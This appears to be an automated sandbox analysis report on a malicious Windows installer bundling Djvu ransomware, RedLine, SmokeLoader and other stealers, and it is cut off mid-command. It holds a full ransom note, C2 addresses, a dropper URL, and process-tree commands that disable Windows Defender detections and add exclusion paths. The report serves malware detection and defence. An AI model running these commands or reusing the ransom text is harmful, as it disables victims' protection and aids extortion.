Resubmissions
30-09-2021 05:45
210930-gf4veagef9 1029-09-2021 21:32
210929-1dyp6agaam 1029-09-2021 18:54
210929-xkfldaffb2 10Analysis
-
max time kernel
1803s -
max time network
1806s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
29-09-2021 21:32
General
-
Target
setup_x86_x64_install.exe
-
Size
7.1MB
-
MD5
cd08a9c57ce8115745d3a99dec48847d
-
SHA1
2ea5cea16935f511935a86ea7a2903a44d593247
-
SHA256
52895feec7505eb0c3a418c93ecaf8559d4d7f9f67c68e3a268c606c069d04cc
-
SHA512
0ad7757713eca784f6b8c50e1912f91264f0e210dd61e7a6e779390dc2040b6744d552aac120c2ec8d65bfbb048672cb7959d026691ef1037b63e24fec024233
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://shellloader.top/welcome
Extracted
Path
C:\_readme.txt
Family
djvu
Ransom Note
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-2zbBkO06mv
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
manager@mailtemp.ch
Reserve e-mail address to contact us:
supporthelp@airmail.cc
Your personal ID:
0335gSd743dEy1gd1zw5QaTuD9AdJnQXoohKZidIKAiW6h35Dxs
Emails
manager@mailtemp.ch
supporthelp@airmail.cc
URLs
https://we.tl/t-2zbBkO06mv
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
redline
Botnet
jamesfuck
C2
65.108.20.195:6774
Extracted
Family
smokeloader
Version
2020
C2
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
rc4.i32
rc4.i32
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 64 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
-
Checks BIOS information in registry 2 TTPs 23 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 2 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
-
Checks for any installed AV software in registry 1 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 12 IoCs
-
Drops Chrome extension 4 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 17 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 64 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 44 IoCs
-
Suspicious use of SetThreadContext 43 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 41 IoCs
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 6 IoCs
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 12 IoCs
-
Kills process with taskkill 21 IoCs
-
Modifies Internet Explorer settings 1 TTPs 8 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 38 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 14 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\GYXbneo.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\GYXbneo.exe uG /site_id 394347 /S2⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 